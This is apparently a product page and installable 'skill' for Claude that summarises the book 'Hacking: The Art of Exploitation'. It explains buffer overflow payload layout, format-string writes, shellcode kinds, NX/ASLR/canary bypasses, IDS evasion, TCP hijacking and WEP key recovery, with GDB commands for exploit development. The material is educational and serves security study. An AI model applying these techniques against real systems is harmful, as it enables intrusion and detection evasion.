Hacking: The Art of Exploitation
Low-level exploitation from first principles — C programming, x86 memory layout, buffer overflows, format strings, shellcode writing, network hacking, and countermeasure bypasses. Erickson explains the 'why' behind techniques rather than just the 'how'.
- › Analyze stack frame layout to identify buffer overflow offset to return address
- › Classify vulnerability type: stack overflow, heap overflow, BSS overflow, format string
- › Explain format string %n write primitive and arbitrary memory write technique
- › Describe shellcode requirements: position-independent, null-free, size-constrained
- › Explain return-to-libc as NX/DEP bypass without shellcode
- › Map OSI layers to relevant attack surface (hijacking, spoofing, ARP poisoning)
- › Explain TCP/IP hijacking via sequence number prediction
- › Analyze WEP FMS attack — RC4 KSA weakness and IV-based key recovery
- › Describe ASLR bypass conditions: 32-bit brute force, heap spray, info leak chaining
- › Apply password probability matrices vs brute force vs rainbow table tradeoffs
Install this skill and Claude can analyze stack frame layouts to calculate buffer overflow offsets, explain format string and heap exploitation mechanics, reason through shellcode constraints and countermeasure bypass strategies, and map network attacks like TCP hijacking to their underlying protocol weaknesses
Understanding exploitation at the implementation level — not just conceptually — is the foundation of both offensive security and meaningful defense; practitioners who can reason from first principles about memory corruption and countermeasure bypasses build better mitigations and evaluate vulnerability reports with real accuracy
- › Analyzing a vulnerable C program to identify the buffer overflow offset to the return address, determine NX and stack canary status, and construct a return-to-libc payload
- › Reviewing shellcode for null bytes, position-dependence, or other properties that would cause it to fail in specific delivery contexts such as strcpy-based overflow exploits
- › Explaining the mechanics of TCP session hijacking or ARP poisoning and identifying which defensive controls (TLS, DNSSEC, DHCP snooping) mitigate each attack
Hacking: The Art of Exploitation Skill
Core Philosophy
Hacking is creative problem solving — finding unintended uses of a system’s own rules. Security researchers must understand attacks at the implementation level to build meaningful defenses. Understanding exploitation is prerequisite to understanding how to prevent it.
The co-evolutionary model: attacking hackers find weaknesses → defending hackers build mitigations → attacking hackers develop evasion → better mitigations emerge. Understanding both sides produces smarter security.
Memory Layout Fundamentals
Process Memory Segments
High addresses
┌────────────────┐
│ Stack │ ← grows DOWN — local vars, return addresses, saved frames
│ (grows ↓) │
├────────────────┤
│ ... │
│ (grows ↑) │
│ Heap │ ← dynamic allocation (malloc/new)
├────────────────┤
│ BSS │ ← uninitialized globals
│ Data │ ← initialized globals
│ Text/Code │ ← read-only executable instructions
Low addresses
Stack Frame Layout (x86)
When a function is called:
- Arguments pushed onto stack (right to left in cdecl)
- Return address pushed (EIP saved)
- Previous frame pointer pushed (EBP saved)
- ESP moved to create space for locals
Higher addresses
┌──────────────────┐
│ arg2 │
│ arg1 │
│ return address │ ← EIP before call
│ saved EBP │ ← old base pointer
│ local var 1 │
│ local var 2 │ ← ESP points here
└──────────────────┘
Lower addresses
Key registers:
- EIP: instruction pointer — what executes next
- ESP: stack pointer — top of stack
- EBP: base pointer — reference for current frame
Exploitation Vulnerability Classes
Stack Buffer Overflow
When a fixed-size buffer on the stack is written past its end, attacker can overwrite:
- Adjacent local variables
- Saved EBP (frame pointer)
- Saved return address ← the primary target
Exploitability check:
- Is the destination buffer on the stack?
- Is there an unbounded copy (strcpy, gets, scanf %s)?
- Can attacker control input length and content?
Classic payload structure:
[NOP sled][shellcode][padding][new_return_address → NOP sled]
Off-by-one errors: writing exactly one byte past the end of an array can still overwrite the null terminator of an adjacent string or the low byte of a saved pointer.
Heap Buffer Overflow
Overflows on the heap corrupt heap metadata (prev_size, size fields in glibc’s dlmalloc), allowing:
- Arbitrary write primitive via free() unlink operation
- Overwriting function pointers stored on heap
- Use-after-free conditions
BSS/Data Segment Overflows
Global/static variables in BSS/Data can be overflowed into adjacent variables. Often more reliable than stack overflows (no ASLR for BSS in older systems, no stack canary).
Format String Vulnerabilities
printf(user_input); // vulnerable
printf("%s", user_input); // safe
The %n format specifier writes the number of bytes printed so far to the address provided as argument. With no argument provided, it reads from wherever the stack pointer lands.
Capabilities:
- Read:
%xor%sto read stack values - Write:
%nto write arbitrary 4-byte values to arbitrary addresses - Arbitrary read/write: combine
%[n]$xparameter field with controlled stack layout
Technique — writing to an address:
- Put target address in the input string (it lands on the stack)
- Use
%[offset]$nto write to that address - Control the write value via padding in the format string
Shellcode Fundamentals
Shellcode Requirements
- Position-independent: no hardcoded addresses
- No null bytes: strcpy stops at \x00
- Small: must fit in available buffer space
Shell-Spawning Shellcode (x86 Linux)
Uses execve syscall (int 0x80) with:
- EAX = 0x0b (execve syscall number)
- EBX = pointer to “/bin/sh” string
- ECX = pointer to argv array
- EDX = pointer to envp (NULL)
Key technique: use call instruction to get address of “/bin/sh” string onto stack (the call pushes EIP, which points past the call to the string data).
Port-Binding Shellcode
Creates a socket, binds to a port, listens, accepts, then dup2() the socket fd to stdin/stdout/stderr, then execve /bin/sh. Gives remote shell on the target machine.
Connect-Back Shellcode
Connects back to attacker’s IP:port using socket + connect syscalls, then dup2 + execve. Bypasses firewalls that block inbound connections.
Network Layer Knowledge
OSI Model for Security Analysis
7 Application ← HTTP, FTP, SSH — protocol vulns here
6 Presentation ← encoding/encryption issues
5 Session ← session hijacking
4 Transport ← TCP/UDP — SYN floods, TCP hijacking
3 Network ← IP — spoofing, routing attacks
2 Data Link ← ARP — ARP poisoning
1 Physical ← physical access
TCP/IP Hijacking
- Sniff a TCP connection (get seq/ack numbers)
- Wait for silence (no data flowing)
- Inject packet with correct seq/ack numbers and spoofed source IP
- The server accepts it as legitimate traffic from the original client
Prevention: encrypted transport (TLS/SSH) makes hijacking useless even if sequence numbers are guessed.
Port Scanning Technique (SYN scan)
Send SYN packets; analyze responses:
- SYN-ACK → port open
- RST → port closed
- No response → filtered
Countermeasures and Bypass Techniques
Nonexecutable Stack (NX/DEP)
What it does: marks stack pages with NW (No-Execute) bit; shellcode on stack triggers fault.
Bypass — Return-to-libc:
Instead of jumping to shellcode, overwrite return address with address of system() in libc, with “/bin/sh” as the argument on the stack. No shellcode needed.
Address Space Layout Randomization (ASLR)
What it does: randomizes base addresses of stack, heap, libraries.
Bypass conditions:
- 32-bit systems: only ~16 bits of entropy for stack, brute-forceable
- Heap spray: allocate large blocks of NOP+shellcode, increases hit probability
- Info leak: find a read primitive to leak addresses first, then calculate offsets
Stack Canaries
What they do: place a random value before the saved return address; checked on return.
Bypass conditions:
- Format string read can leak the canary value
- Heap overflows bypass the canary entirely
- Off-by-one that only corrupts EBP (some implementations)
IDS Evasion
- Fragment packets below IDS reassembly threshold
- Send out-of-order fragments (IDS may not handle overlap correctly)
- Use shellcode encodings/stubs that decode at runtime
- Use polymorphic shellcode (different bytes, same behavior)
Cryptography Fundamentals
Symmetric vs Asymmetric
| Symmetric | Asymmetric | |
|---|---|---|
| Keys | One shared secret | Public/private pair |
| Speed | Fast | Slow |
| Problem | Key distribution | Computationally expensive |
| Use | Bulk data | Key exchange + signatures |
Hybrid ciphers (TLS, PGP): use asymmetric to exchange a symmetric session key, then symmetric for data.
Password Cracking Approaches
- Dictionary attack: try known words and variants
- Brute force: exhaustive — infeasible for long passwords
- Probability matrix: weight guesses by character frequency in real passwords (most effective)
- Rainbow tables: precomputed hash→password mappings (defeated by salt)
WEP Weakness (FMS Attack)
WEP uses RC4 with a weak key scheduling algorithm (KSA). When an IV starting with (A+3, 255, X) is used:
- The second byte of the keystream output reveals information about the key byte
- With 4–6 million packets, enough weak IVs accumulate to reconstruct the key
Lesson: IV reuse + weak KSA = statistical key recovery. Never design stream ciphers with predictable, small IVs.
Debugging for Exploitation
GDB Commands for Exploit Development
info registers # dump all register values
x/20x $esp # examine 20 words at ESP in hex
x/s <address> # examine as string
break *<address> # breakpoint at exact address
run $(python -c 'print "A"*100') # pass generated input
disassemble <function> # show disassembly
Finding Buffer Offset to Return Address
- Generate a De Bruijn sequence (unique 4-byte patterns at every position)
- Run program, let it crash
- EIP contains a unique 4-byte sequence
- Look up position in the De Bruijn sequence → that’s the offset
Finding the Right Return Address
- On vulnerable local binary: use GDB to find ESP at the overflow point
- On remote target: estimate based on binary info, use NOP sled to increase margin
- For ret-to-libc:
ldd binary | grep libcthennm -D libc.so | grep ' system'